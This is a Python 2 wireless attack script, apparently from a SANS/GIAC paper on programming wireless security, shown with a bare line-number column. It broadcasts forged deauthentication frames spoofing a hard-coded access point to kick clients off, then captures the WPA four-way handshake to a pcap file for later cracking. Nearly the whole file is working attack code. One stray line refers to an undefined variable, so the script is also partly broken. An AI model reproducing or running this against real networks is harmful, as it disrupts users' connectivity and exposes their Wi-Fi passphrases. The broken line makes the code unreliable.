viensamoi/contrib/4whsg.py


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135

#!/usr/bin/env python

########################################
#
# This code is part of the SANS/GIAC Gold Paper titled
#
# Programming Wireless Security
#
# by Robin Wood (dninja@gmail.com), accepted May 2008
#
# For more information you can find the paper in the "Wireless Access" section of the
# SANS Reading Room at http://www.sans.org/reading_room/ or at www.digininja.org
#
########################################

import sys
from scapy import *
import pylorcon

interface = "ath0"
#interface = sys.argv[1]    
eapol_packets = []
handshake_found = 0

injector = pylorcon.Lorcon("ath0", "madwifing")
injector.setfunctionalmode("INJECT")
injector.setmode("MONITOR")
injector.setchannel(11)

destination_addr = '\xff\xff\xff\xff\xff\xff' # i.e. broadcast
bss_id_addr = '\x00\x0e\xa6\xce\xe2\x28'
source_addr = bss_id_addr # The AP is sending the deauth

packet = "\xc0\x00\x3a\x01"
packet = packet + destination_addr
packet = packet + source_addr
packet = packet + bss_id_addr
packet = packet + "\x80\xcb\x07\x00";

def deauth(packet_count):
	for n in range(packet_count):
		injector.txpacket (packet)


mac = ":".join([i.zfill(2) for i in mac.split(":")]).lower()

def sniffEAPOL(p):
	if p.haslayer(WPA_key):
		layer = p.getlayer (WPA_key)

		# First, check that the access point is the one we want to target
		AP = p.addr3
		if (not AP == bss_id_addr):
			print AP
			print "not ours\n"
			return

		if (p.FCfield & 1): 
			# Message come from STA 
			# From DS = 0, To DS = 1
			STA = p.addr2
		elif (p.FCfield & 2): 
			# Message come from AP
			# From DS = 1, To DS = 0
			STA = p.addr1
		else:
			# either ad-hoc or WDS
			return
	
		if (not tracking.has_key (STA)):
			fields = {
						'frame2': None,
						'frame3': None,
						'frame4': None,
						'replay_counter': None,
						'packets': []
					}
			tracking[STA] = fields

		key_info = layer.key_info
		wpa_key_length = layer.wpa_key_length
		replay_counter = layer.replay_counter

		WPA_KEY_INFO_INSTALL = 64
		WPA_KEY_INFO_ACK = 128
		WPA_KEY_INFO_MIC = 256

		# check for frame 2
		if ((key_info & WPA_KEY_INFO_MIC) and 
			(key_info & WPA_KEY_INFO_ACK == 0) and 
			(key_info & WPA_KEY_INFO_INSTALL == 0) and 
			(wpa_key_length > 0)) :
			print "Found packet 2 for ", STA
			tracking[STA]['frame2'] = 1
			tracking[STA]['packets'].append (p)

		# check for frame 3
		elif ((key_info & WPA_KEY_INFO_MIC) and 
			(key_info & WPA_KEY_INFO_ACK) and 
			(key_info & WPA_KEY_INFO_INSTALL)):
			print "Found packet 3 for ", STA
			tracking[STA]['frame3'] = 1
			# store the replay counter for this STA
			tracking[STA]['replay_counter'] = replay_counter
			tracking[STA]['packets'].append (p)

		# check for frame 4
		elif ((key_info & WPA_KEY_INFO_MIC) and 
			(key_info & WPA_KEY_INFO_ACK == 0) and 
			(key_info & WPA_KEY_INFO_INSTALL == 0) and
			tracking[STA]['replay_counter'] == replay_counter):
			print "Found packet 4 for ", STA
			tracking[STA]['frame4'] = 1
			tracking[STA]['packets'].append (p)

		
		if (tracking[STA]['frame2'] and tracking[STA]['frame3'] and tracking[STA]['frame4']):
			print "Handshake Found\n\n"
			wrpcap ("/var/gold/a.pcap", tracking[STA]['packets'])
			handshake_found = 1
			sys.exit(0)

tracking = {}

for i in range(1, 10):
	print "About to deauth\n\n"
	deauth(50)
	print "Deauth done, sniffing for EAPOL traffic"

	# reset the tracking between each sniffing attempt
	tracking = {}

	sniff(iface=interface,prn=sniffEAPOL, count=1000, timeout=30)
	
print "No handshake found\n\n"